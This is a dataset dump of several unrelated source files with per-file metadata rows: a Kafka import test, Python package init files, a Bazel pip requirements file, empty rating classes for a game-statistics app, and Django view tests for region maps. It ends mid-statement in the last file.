| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7aaff4c30abf1ec3746de3638e93b6a55f2cb896
| 163
|
py
|
Python
|
frontera/tests/test_kafka_import.py
|
TeamHG-Memex/frontera
|
06ab4002428528a2d8b67c1e82368cc5988b2228
|
[
"BSD-3-Clause"
] | 3
|
2015-11-11T19:37:16.000Z
|
2017-03-15T13:33:54.000Z
|
frontera/tests/test_kafka_import.py
|
TeamHG-Memex/frontera
|
06ab4002428528a2d8b67c1e82368cc5988b2228
|
[
"BSD-3-Clause"
] | null | null | null |
frontera/tests/test_kafka_import.py
|
TeamHG-Memex/frontera
|
06ab4002428528a2d8b67c1e82368cc5988b2228
|
[
"BSD-3-Clause"
] | 2
|
2016-09-08T08:30:24.000Z
|
2018-10-02T22:00:47.000Z
|
# -*- coding: utf-8 -*-
def test_kafka_messagebus_import():
import frontera.contrib.messagebus.kafka
import frontera.contrib.messagebus.kafkabus
pass
| 23.285714
| 47
| 0.736196
| 19
| 163
| 6.157895
| 0.631579
| 0.239316
| 0.358974
| 0.529915
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007246
| 0.153374
| 163
| 7
| 48
| 23.285714
| 0.84058
| 0.128834
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0.25
| 0.75
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 10
|
7ac04146eef9e4689369194a0150a21bd897ca6f
| 57
|
py
|
Python
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_0/__init__.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2018-12-29T09:53:39.000Z
|
2018-12-29T09:53:42.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_0/__init__.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_0/__init__.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
from ._pkg1_1_1_0_0 import *
from ._pkg1_1_1_0_1 import *
| 28.5
| 28
| 0.807018
| 14
| 57
| 2.571429
| 0.357143
| 0.444444
| 0.5
| 0.555556
| 0.611111
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 0.122807
| 57
| 2
| 29
| 28.5
| 0.52
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
64e911f8e0446986aa59a03346656d1e9d90be11
| 331
|
py
|
Python
|
build/lib/dermoscopy_preprocessing/contrast/__init__.py
|
ClaudiaOM/Image_Preprocessing_Library
|
dd1bbbf2170b53a92c1f46053e36d85a97f544f8
|
[
"MIT"
] | 3
|
2022-02-04T23:25:29.000Z
|
2022-02-21T22:58:10.000Z
|
dermoscopy_preprocessing/contrast/__init__.py
|
ClaudiaOM/Image_Preprocessing_Library
|
dd1bbbf2170b53a92c1f46053e36d85a97f544f8
|
[
"MIT"
] | null | null | null |
dermoscopy_preprocessing/contrast/__init__.py
|
ClaudiaOM/Image_Preprocessing_Library
|
dd1bbbf2170b53a92c1f46053e36d85a97f544f8
|
[
"MIT"
] | null | null | null |
from .contrast import equalize_histogram
from .contrast import clahe
from .contrast import automatic_brightness_and_contrast
from .contrast import window_enhancement
from .contrast import histogram_bimodality
from .contrast import morphological_contrast_enhancement
from .contrast import reverse_morphological_contrast_enhancement
| 41.375
| 64
| 0.89426
| 39
| 331
| 7.307692
| 0.358974
| 0.294737
| 0.442105
| 0.203509
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084592
| 331
| 7
| 65
| 47.285714
| 0.940594
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8f438e32751bbd0c49d7a3e9a16e923b804d2178
| 4,402
|
bzl
|
Python
|
pycross/private/pypi_requirements.bzl
|
jvolkman/rules_python_cross
|
7d6426a9c929c8a789d0edb502f29474ecf8a63c
|
[
"Apache-2.0"
] | 4
|
2022-03-29T13:58:58.000Z
|
2022-03-31T11:10:28.000Z
|
pycross/private/pypi_requirements.bzl
|
jvolkman/rules_python_cross
|
7d6426a9c929c8a789d0edb502f29474ecf8a63c
|
[
"Apache-2.0"
] | null | null | null |
pycross/private/pypi_requirements.bzl
|
jvolkman/rules_python_cross
|
7d6426a9c929c8a789d0edb502f29474ecf8a63c
|
[
"Apache-2.0"
] | null | null | null |
load("@rules_python//python/pip_install:pip_repository.bzl", "whl_library")
all_requirements = ["@rules_pycross_pypi_deps_build//:pkg", "@rules_pycross_pypi_deps_dacite//:pkg", "@rules_pycross_pypi_deps_installer//:pkg", "@rules_pycross_pypi_deps_packaging//:pkg", "@rules_pycross_pypi_deps_pep517//:pkg", "@rules_pycross_pypi_deps_poetry_core//:pkg", "@rules_pycross_pypi_deps_pyparsing//:pkg", "@rules_pycross_pypi_deps_tomli//:pkg", "@rules_pycross_pypi_deps_wheel//:pkg"]
all_whl_requirements = ["@rules_pycross_pypi_deps_build//:whl", "@rules_pycross_pypi_deps_dacite//:whl", "@rules_pycross_pypi_deps_installer//:whl", "@rules_pycross_pypi_deps_packaging//:whl", "@rules_pycross_pypi_deps_pep517//:whl", "@rules_pycross_pypi_deps_poetry_core//:whl", "@rules_pycross_pypi_deps_pyparsing//:whl", "@rules_pycross_pypi_deps_tomli//:whl", "@rules_pycross_pypi_deps_wheel//:whl"]
_packages = [('rules_pycross_pypi_deps_build', 'build==0.7.0 --hash=sha256:1aaadcd69338252ade4f7ec1265e1a19184bf916d84c9b7df095f423948cb89f --hash=sha256:21b7ebbd1b22499c4dac536abc7606696ea4d909fd755e00f09f3c0f2c05e3c8'), ('rules_pycross_pypi_deps_dacite', 'dacite==1.6.0 --hash=sha256:4331535f7aabb505c732fa4c3c094313fc0a1d5ea19907bf4726a7819a68b93f --hash=sha256:d48125ed0a0352d3de9f493bf980038088f45f3f9d7498f090b50a847daaa6df'), ('rules_pycross_pypi_deps_installer', 'installer==0.5.1 --hash=sha256:1d6c8d916ed82771945b9c813699e6f57424ded970c9d8bf16bbc23e1e826ed3 --hash=sha256:f970995ec2bb815e2fdaf7977b26b2091e1e386f0f42eafd5ac811953dc5d445'), ('rules_pycross_pypi_deps_packaging', 'packaging==21.3 --hash=sha256:dd47c42927d89ab911e606518907cc2d3a1f38bbd026385970643f9c5b8ecfeb --hash=sha256:ef103e05f519cdc783ae24ea4e2e0f508a9c99b2d4969652eed6a2e1ea5bd522'), ('rules_pycross_pypi_deps_pep517', 'pep517==0.12.0 --hash=sha256:931378d93d11b298cf511dd634cf5ea4cb249a28ef84160b3247ee9afb4e8ab0 --hash=sha256:dd884c326898e2c6e11f9e0b64940606a93eb10ea022a2e067959f3a110cf161'), ('rules_pycross_pypi_deps_poetry_core', 'poetry-core==1.0.8 --hash=sha256:54b0fab6f7b313886e547a52f8bf52b8cf43e65b2633c65117f8755289061924 --hash=sha256:951fc7c1f8d710a94cb49019ee3742125039fc659675912ea614ac2aa405b118'), ('rules_pycross_pypi_deps_pyparsing', 'pyparsing==3.0.7 --hash=sha256:18ee9022775d270c55187733956460083db60b37d0d0fb357445f3094eed3eea --hash=sha256:a6c06a88f252e6c322f65faf8f418b16213b51bdfaece0524c1c1bc30c63c484'), ('rules_pycross_pypi_deps_tomli', 'tomli==2.0.1 --hash=sha256:939de3e7a6161af0c887ef91b7d41a53e7c5a1ca976325f429cb46ea9bc30ecc --hash=sha256:de526c12914f0c550d15924c62d72abc48d6fe7364aa87328337a31007fe8a4f'), ('rules_pycross_pypi_deps_wheel', 'wheel==0.37.1 --hash=sha256:4bdcd7d840138086126cd09254dc6195fb4fc6f01c050a1d7236f2630db1d22a --hash=sha256:e9a504e793efbca1b8e0e9cb979a249cf4a0a7b5b8c9e8b65a5e39d49529c1c4')]
_config = {'python_interpreter': 'python3', 'python_interpreter_target': None, 'quiet': True, 'timeout': 600, 'repo': 'rules_pycross_pypi_deps', 'isolated': True, 'extra_pip_args': [], 'pip_data_exclude': [], 'enable_implicit_namespace_pkgs': False, 'environment': {}, 'repo_prefix': 'rules_pycross_pypi_deps_'}
_annotations = {}
def _clean_name(name):
return name.replace("-", "_").replace(".", "_").lower()
def requirement(name):
return "@rules_pycross_pypi_deps_" + _clean_name(name) + "//:pkg"
def whl_requirement(name):
return "@rules_pycross_pypi_deps_" + _clean_name(name) + "//:whl"
def data_requirement(name):
return "@rules_pycross_pypi_deps_" + _clean_name(name) + "//:data"
def dist_info_requirement(name):
return "@rules_pycross_pypi_deps_" + _clean_name(name) + "//:dist_info"
def entry_point(pkg, script = None):
if not script:
script = pkg
return "@rules_pycross_pypi_deps_" + _clean_name(pkg) + "//:rules_python_wheel_entry_point_" + script
def _get_annotation(requirement):
# This expects to parse `setuptools==58.2.0 --hash=sha256:2551203ae6955b9876741a26ab3e767bb3242dafe86a32a749ea0d78b6792f11`
# down wo `setuptools`.
name = requirement.split(" ")[0].split("=")[0]
return _annotations.get(name)
def install_deps():
for name, requirement in _packages:
whl_library(
name = name,
requirement = requirement,
annotation = _get_annotation(requirement),
**_config,
)
| 97.822222
| 2,006
| 0.787824
| 435
| 4,402
| 7.528736
| 0.248276
| 0.12458
| 0.166107
| 0.207634
| 0.322137
| 0.126718
| 0.076641
| 0.065954
| 0.065954
| 0.065954
| 0
| 0.220782
| 0.088369
| 4,402
| 44
| 2,007
| 100.045455
| 0.595315
| 0.033394
| 0
| 0
| 0
| 0.032258
| 0.71825
| 0.631703
| 0
| 0
| 0
| 0
| 0
| 1
| 0.258065
| false
| 0
| 0
| 0.16129
| 0.483871
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 8
|
56b6e2ec4c7f1604e30dd7b06109cc68d618b35c
| 6,131
|
py
|
Python
|
loldib/getratings/models/NA/na_zac/na_zac_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_zac/na_zac_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_zac/na_zac_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Zac_Top_Aatrox(Ratings):
pass
class NA_Zac_Top_Ahri(Ratings):
pass
class NA_Zac_Top_Akali(Ratings):
pass
class NA_Zac_Top_Alistar(Ratings):
pass
class NA_Zac_Top_Amumu(Ratings):
pass
class NA_Zac_Top_Anivia(Ratings):
pass
class NA_Zac_Top_Annie(Ratings):
pass
class NA_Zac_Top_Ashe(Ratings):
pass
class NA_Zac_Top_AurelionSol(Ratings):
pass
class NA_Zac_Top_Azir(Ratings):
pass
class NA_Zac_Top_Bard(Ratings):
pass
class NA_Zac_Top_Blitzcrank(Ratings):
pass
class NA_Zac_Top_Brand(Ratings):
pass
class NA_Zac_Top_Braum(Ratings):
pass
class NA_Zac_Top_Caitlyn(Ratings):
pass
class NA_Zac_Top_Camille(Ratings):
pass
class NA_Zac_Top_Cassiopeia(Ratings):
pass
class NA_Zac_Top_Chogath(Ratings):
pass
class NA_Zac_Top_Corki(Ratings):
pass
class NA_Zac_Top_Darius(Ratings):
pass
class NA_Zac_Top_Diana(Ratings):
pass
class NA_Zac_Top_Draven(Ratings):
pass
class NA_Zac_Top_DrMundo(Ratings):
pass
class NA_Zac_Top_Ekko(Ratings):
pass
class NA_Zac_Top_Elise(Ratings):
pass
class NA_Zac_Top_Evelynn(Ratings):
pass
class NA_Zac_Top_Ezreal(Ratings):
pass
class NA_Zac_Top_Fiddlesticks(Ratings):
pass
class NA_Zac_Top_Fiora(Ratings):
pass
class NA_Zac_Top_Fizz(Ratings):
pass
class NA_Zac_Top_Galio(Ratings):
pass
class NA_Zac_Top_Gangplank(Ratings):
pass
class NA_Zac_Top_Garen(Ratings):
pass
class NA_Zac_Top_Gnar(Ratings):
pass
class NA_Zac_Top_Gragas(Ratings):
pass
class NA_Zac_Top_Graves(Ratings):
pass
class NA_Zac_Top_Hecarim(Ratings):
pass
class NA_Zac_Top_Heimerdinger(Ratings):
pass
class NA_Zac_Top_Illaoi(Ratings):
pass
class NA_Zac_Top_Irelia(Ratings):
pass
class NA_Zac_Top_Ivern(Ratings):
pass
class NA_Zac_Top_Janna(Ratings):
pass
class NA_Zac_Top_JarvanIV(Ratings):
pass
class NA_Zac_Top_Jax(Ratings):
pass
class NA_Zac_Top_Jayce(Ratings):
pass
class NA_Zac_Top_Jhin(Ratings):
pass
class NA_Zac_Top_Jinx(Ratings):
pass
class NA_Zac_Top_Kalista(Ratings):
pass
class NA_Zac_Top_Karma(Ratings):
pass
class NA_Zac_Top_Karthus(Ratings):
pass
class NA_Zac_Top_Kassadin(Ratings):
pass
class NA_Zac_Top_Katarina(Ratings):
pass
class NA_Zac_Top_Kayle(Ratings):
pass
class NA_Zac_Top_Kayn(Ratings):
pass
class NA_Zac_Top_Kennen(Ratings):
pass
class NA_Zac_Top_Khazix(Ratings):
pass
class NA_Zac_Top_Kindred(Ratings):
pass
class NA_Zac_Top_Kled(Ratings):
pass
class NA_Zac_Top_KogMaw(Ratings):
pass
class NA_Zac_Top_Leblanc(Ratings):
pass
class NA_Zac_Top_LeeSin(Ratings):
pass
class NA_Zac_Top_Leona(Ratings):
pass
class NA_Zac_Top_Lissandra(Ratings):
pass
class NA_Zac_Top_Lucian(Ratings):
pass
class NA_Zac_Top_Lulu(Ratings):
pass
class NA_Zac_Top_Lux(Ratings):
pass
class NA_Zac_Top_Malphite(Ratings):
pass
class NA_Zac_Top_Malzahar(Ratings):
pass
class NA_Zac_Top_Maokai(Ratings):
pass
class NA_Zac_Top_MasterYi(Ratings):
pass
class NA_Zac_Top_MissFortune(Ratings):
pass
class NA_Zac_Top_MonkeyKing(Ratings):
pass
class NA_Zac_Top_Mordekaiser(Ratings):
pass
class NA_Zac_Top_Morgana(Ratings):
pass
class NA_Zac_Top_Nami(Ratings):
pass
class NA_Zac_Top_Nasus(Ratings):
pass
class NA_Zac_Top_Nautilus(Ratings):
pass
class NA_Zac_Top_Nidalee(Ratings):
pass
class NA_Zac_Top_Nocturne(Ratings):
pass
class NA_Zac_Top_Nunu(Ratings):
pass
class NA_Zac_Top_Olaf(Ratings):
pass
class NA_Zac_Top_Orianna(Ratings):
pass
class NA_Zac_Top_Ornn(Ratings):
pass
class NA_Zac_Top_Pantheon(Ratings):
pass
class NA_Zac_Top_Poppy(Ratings):
pass
class NA_Zac_Top_Quinn(Ratings):
pass
class NA_Zac_Top_Rakan(Ratings):
pass
class NA_Zac_Top_Rammus(Ratings):
pass
class NA_Zac_Top_RekSai(Ratings):
pass
class NA_Zac_Top_Renekton(Ratings):
pass
class NA_Zac_Top_Rengar(Ratings):
pass
class NA_Zac_Top_Riven(Ratings):
pass
class NA_Zac_Top_Rumble(Ratings):
pass
class NA_Zac_Top_Ryze(Ratings):
pass
class NA_Zac_Top_Sejuani(Ratings):
pass
class NA_Zac_Top_Shaco(Ratings):
pass
class NA_Zac_Top_Shen(Ratings):
pass
class NA_Zac_Top_Shyvana(Ratings):
pass
class NA_Zac_Top_Singed(Ratings):
pass
class NA_Zac_Top_Sion(Ratings):
pass
class NA_Zac_Top_Sivir(Ratings):
pass
class NA_Zac_Top_Skarner(Ratings):
pass
class NA_Zac_Top_Sona(Ratings):
pass
class NA_Zac_Top_Soraka(Ratings):
pass
class NA_Zac_Top_Swain(Ratings):
pass
class NA_Zac_Top_Syndra(Ratings):
pass
class NA_Zac_Top_TahmKench(Ratings):
pass
class NA_Zac_Top_Taliyah(Ratings):
pass
class NA_Zac_Top_Talon(Ratings):
pass
class NA_Zac_Top_Taric(Ratings):
pass
class NA_Zac_Top_Teemo(Ratings):
pass
class NA_Zac_Top_Thresh(Ratings):
pass
class NA_Zac_Top_Tristana(Ratings):
pass
class NA_Zac_Top_Trundle(Ratings):
pass
class NA_Zac_Top_Tryndamere(Ratings):
pass
class NA_Zac_Top_TwistedFate(Ratings):
pass
class NA_Zac_Top_Twitch(Ratings):
pass
class NA_Zac_Top_Udyr(Ratings):
pass
class NA_Zac_Top_Urgot(Ratings):
pass
class NA_Zac_Top_Varus(Ratings):
pass
class NA_Zac_Top_Vayne(Ratings):
pass
class NA_Zac_Top_Veigar(Ratings):
pass
class NA_Zac_Top_Velkoz(Ratings):
pass
class NA_Zac_Top_Vi(Ratings):
pass
class NA_Zac_Top_Viktor(Ratings):
pass
class NA_Zac_Top_Vladimir(Ratings):
pass
class NA_Zac_Top_Volibear(Ratings):
pass
class NA_Zac_Top_Warwick(Ratings):
pass
class NA_Zac_Top_Xayah(Ratings):
pass
class NA_Zac_Top_Xerath(Ratings):
pass
class NA_Zac_Top_XinZhao(Ratings):
pass
class NA_Zac_Top_Yasuo(Ratings):
pass
class NA_Zac_Top_Yorick(Ratings):
pass
class NA_Zac_Top_Zac(Ratings):
pass
class NA_Zac_Top_Zed(Ratings):
pass
class NA_Zac_Top_Ziggs(Ratings):
pass
class NA_Zac_Top_Zilean(Ratings):
pass
class NA_Zac_Top_Zyra(Ratings):
pass
| 14.702638
| 46
| 0.750938
| 972
| 6,131
| 4.3107
| 0.151235
| 0.230549
| 0.329356
| 0.428162
| 0.784726
| 0.784726
| 0
| 0
| 0
| 0
| 0
| 0
| 0.18121
| 6,131
| 416
| 47
| 14.737981
| 0.834661
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
56b93ee34726ab7b644661e30a2c82e21a498fd3
| 40,534
|
py
|
Python
|
maps/tests/test_views.py
|
lueho/BRIT
|
1eae630c4da6f072aa4e2139bc406db4f4756391
|
[
"MIT"
] | null | null | null |
maps/tests/test_views.py
|
lueho/BRIT
|
1eae630c4da6f072aa4e2139bc406db4f4756391
|
[
"MIT"
] | 4
|
2022-03-29T20:52:31.000Z
|
2022-03-29T20:52:31.000Z
|
maps/tests/test_views.py
|
lueho/BRIT
|
1eae630c4da6f072aa4e2139bc406db4f4756391
|
[
"MIT"
] | null | null | null |
from django.contrib.auth.models import Group, User, Permission
from django.test import TestCase, modify_settings
from django.urls import reverse
from rest_framework.test import APITestCase
from users.models import get_default_owner
from ..models import Attribute, RegionAttributeValue, Catchment, LauRegion, NutsRegion, Region, GeoDataset
class NutsRegionMapViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
owner = get_default_owner()
region = Region.objects.create(owner=owner, name='Test Region')
dataset = GeoDataset.objects.create(
owner=owner,
name='Test Dataset',
region=region,
model_name='NutsRegion'
)
def setUp(self):
pass
def test_get_http_200_ok_for_anonymous(self):
response = self.client.get(reverse('NutsRegion'))
self.assertEqual(response.status_code, 200)
class NutsRegionPedigreeAPITestCase(APITestCase):
@classmethod
def setUpTestData(cls):
owner = User.objects.create(username='owner', password='very-secure!')
User.objects.create(username='outsider', password='very-secure!')
member = User.objects.create(username='member', password='very-secure!')
member.user_permissions.add(Permission.objects.get(codename='add_collection'))
uk = NutsRegion.objects.create(
owner=owner,
nuts_id='UK',
levl_code=0,
name_latn='United Kingdom'
)
Catchment.objects.create(
owner=owner,
region=uk.region_ptr
)
ukh = NutsRegion.objects.create(
owner=owner,
nuts_id='UKH',
levl_code=1,
name_latn='East of England',
parent=uk
)
Catchment.objects.create(
owner=owner,
region=ukh.region_ptr,
parent_region=uk.region_ptr
)
ukh1 = NutsRegion.objects.create(
owner=owner,
nuts_id='UKH1',
levl_code=2,
name_latn='East Anglia',
parent=ukh
)
Catchment.objects.create(
owner=owner,
region=ukh1.region_ptr,
parent_region=ukh.region_ptr
)
ukh2 = NutsRegion.objects.create(
owner=owner,
nuts_id='UKH2',
levl_code=2,
name_latn='Bedfordshire and Hertfordshire',
parent=ukh
)
Catchment.objects.create(
owner=owner,
region=ukh2.region_ptr,
parent_region=ukh.region_ptr
)
ukh11 = NutsRegion.objects.create(
owner=owner,
nuts_id='UKH11',
levl_code=3,
name_latn='Peterborough',
parent=ukh1
)
Catchment.objects.create(
owner=owner,
region=ukh11.region_ptr,
parent_region=ukh1.region_ptr
)
ukh14 = NutsRegion.objects.create(
owner=owner,
nuts_id='UKH14',
levl_code=3,
name_latn='Suffolk',
parent=ukh1
)
Catchment.objects.create(
owner=owner,
region=ukh14.region_ptr,
parent_region=ukh1.region_ptr
)
babergh = LauRegion.objects.create(
owner=owner,
lau_id='E07000200',
lau_name='Babergh',
nuts_parent=ukh14
)
Catchment.objects.create(
owner=owner,
region=babergh.region_ptr,
parent_region=ukh14.region_ptr
)
ipswich = LauRegion.objects.create(
owner=owner,
lau_id='E07000202',
lau_name='Ipswich',
nuts_parent=ukh14
)
Catchment.objects.create(
owner=owner,
region=ipswich.region_ptr,
parent_region=ukh14.region_ptr
)
def setUp(self):
self.outsider = User.objects.get(username='outsider')
self.member = User.objects.get(username='member')
self.uk = Catchment.objects.get(region__nutsregion__nuts_id='UK')
self.ukh = Catchment.objects.get(region__nutsregion__nuts_id='UKH')
self.ukh1 = Catchment.objects.get(region__nutsregion__nuts_id='UKH1')
self.ukh2 = Catchment.objects.get(region__nutsregion__nuts_id='UKH2')
self.ukh11 = Catchment.objects.get(region__nutsregion__nuts_id='UKH11')
self.ukh14 = Catchment.objects.get(region__nutsregion__nuts_id='UKH14')
self.babergh = Catchment.objects.get(region__lauregion__lau_id='E07000200')
self.ipswich = Catchment.objects.get(region__lauregion__lau_id='E07000202')
def test_get_http_200_ok_for_anonymous(self):
response = self.client.get(reverse('data.nuts_lau_catchment_options'),
{'id': self.uk.id, 'direction': 'children'})
self.assertEqual(response.status_code, 200)
def test_get_http_400_bad_request_on_missing_query_parameter_id(self):
response = self.client.get(reverse('data.nuts_lau_catchment_options'), {'direction': 'children'})
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.data['detail'],
'Query parameter "id" missing. Must provide valid catchment id.')
def test_get_http_400_bad_request_on_missing_query_parameter_direction(self):
response = self.client.get(reverse('data.nuts_lau_catchment_options'), {'id': self.uk.id})
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.data['detail'],
'Missing or wrong query parameter "direction". Options: "parents", "children"'
)
def test_get_http_400_bad_request_on_wrong_query_parameter_direction(self):
response = self.client.get(reverse('data.nuts_lau_catchment_options'), {'id': self.uk.id, 'direction': 'south'})
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.data['detail'],
'Missing or wrong query parameter "direction". Options: "parents", "children"'
)
def test_get_http_404_bad_request_on_non_existing_region_id(self):
response = self.client.get(reverse('data.nuts_lau_catchment_options'), {'id': 0, 'direction': 'parents'})
self.assertEqual(response.status_code, 404)
self.assertEqual(response.data['detail'], 'A NUTS region with the provided id does not exist.')
def test_get_response_contains_level_4_in_children_if_input_is_level_3(self):
response = self.client.get(reverse('data.nuts_lau_catchment_options'),
{'id': self.ukh14.id, 'direction': 'children'})
self.assertIn('id_level_4', response.data)
@modify_settings(MIDDLEWARE={'remove': 'ai_django_core.middleware.current_user.CurrentUserMiddleware'})
class NutsRegionSummaryAPIViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
owner = get_default_owner()
NutsRegion.objects.create(
owner=owner,
nuts_id='TE57',
name_latn='Test NUTS'
)
def setUp(self):
self.region = NutsRegion.objects.get(nuts_id='TE57')
def test_get_http_200_ok_for_anonymous(self):
response = self.client.get(reverse('data.nutsregion-summary'), {'pk': self.region.pk})
self.assertEqual(response.status_code, 200)
def test_returns_correct_data(self):
response = self.client.get(reverse('data.nutsregion-summary'), {'pk': self.region.pk})
self.assertIn('summaries', response.data)
self.assertEqual(response.data['summaries'][0]['Name'], self.region.name_latn)
# ----------- Attribute CRUD -------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
@modify_settings(MIDDLEWARE={'remove': 'ai_django_core.middleware.current_user.CurrentUserMiddleware'})
class AttributeListViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
User.objects.create(username='outsider')
def setUp(self):
self.outsider = User.objects.get(username='outsider')
def test_get_http_200_ok_for_anonymous(self):
response = self.client.get(reverse('attribute-list'))
self.assertEqual(response.status_code, 200)
def test_get_http_200_ok_for_logged_in_users(self):
self.client.force_login(self.outsider)
response = self.client.get(reverse('attribute-list'))
self.assertEqual(response.status_code, 200)
@modify_settings(MIDDLEWARE={'remove': 'ai_django_core.middleware.current_user.CurrentUserMiddleware'})
class AttributeCreateViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
User.objects.create(username='outsider')
member = User.objects.create(username='member')
members = Group.objects.create(name='members')
members.permissions.add(Permission.objects.get(codename='add_attribute'))
member.groups.add(members)
def setUp(self):
self.member = User.objects.get(username='member')
self.outsider = User.objects.get(username='outsider')
def test_get_http_302_redirect_for_anonymous(self):
response = self.client.get(reverse('attribute-create'))
self.assertEqual(response.status_code, 302)
def test_get_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
response = self.client.get(reverse('attribute-create'))
self.assertEqual(response.status_code, 403)
def test_get_http_200_ok_for_members(self):
self.client.force_login(self.member)
response = self.client.get(reverse('attribute-create'))
self.assertEqual(response.status_code, 200)
def test_post_http_302_redirect_for_anonymous(self):
response = self.client.post(reverse('attribute-create'), data={})
self.assertEqual(response.status_code, 302)
def test_post_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
response = self.client.post(reverse('attribute-create'), data={})
self.assertEqual(response.status_code, 403)
def test_post_http_302_redirect_for_members_with_minimal_data(self):
self.client.force_login(self.member)
data = {'name': 'Test Attribute', 'unit': 'Test Unit'}
response = self.client.post(reverse('attribute-create'), data=data)
self.assertEqual(response.status_code, 302)
@modify_settings(MIDDLEWARE={'remove': 'ai_django_core.middleware.current_user.CurrentUserMiddleware'})
class AttributeModalCreateViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
User.objects.create(username='outsider')
member = User.objects.create(username='member')
members = Group.objects.create(name='members')
members.permissions.add(Permission.objects.get(codename='add_attribute'))
member.groups.add(members)
def setUp(self):
self.member = User.objects.get(username='member')
self.outsider = User.objects.get(username='outsider')
def test_get_http_302_redirect_for_anonymous(self):
response = self.client.get(reverse('attribute-create-modal'))
self.assertEqual(response.status_code, 302)
def test_get_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
response = self.client.get(reverse('attribute-create-modal'))
self.assertEqual(response.status_code, 403)
def test_get_http_200_ok_for_members(self):
self.client.force_login(self.member)
response = self.client.get(reverse('attribute-create-modal'))
self.assertEqual(response.status_code, 200)
def test_post_http_302_redirect_for_anonymous(self):
response = self.client.post(reverse('attribute-create-modal'), data={})
self.assertEqual(response.status_code, 302)
def test_post_http_403_forbidden_for_outsiders(self):
self.client.force_login(self.outsider)
response = self.client.post(reverse('attribute-create-modal'), data={})
self.assertEqual(response.status_code, 403)
def test_post_http_302_redirect_for_members_with_minimal_data(self):
self.client.force_login(self.member)
data = {'name': 'Test Attribute', 'unit': 'Test Unit'}
response = self.client.post(reverse('attribute-create-modal'), data=data)
self.assertEqual(response.status_code, 302)
@modify_settings(MIDDLEWARE={'remove': 'ai_django_core.middleware.current_user.CurrentUserMiddleware'})
class AttributeDetailViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
User.objects.create(username='owner')
User.objects.create(username='outsider')
def setUp(self):
self.owner = User.objects.get(username='owner')
self.outsider = User.objects.get(username='outsider')
self.attribute = Attribute.objects.create(
owner=self.owner,
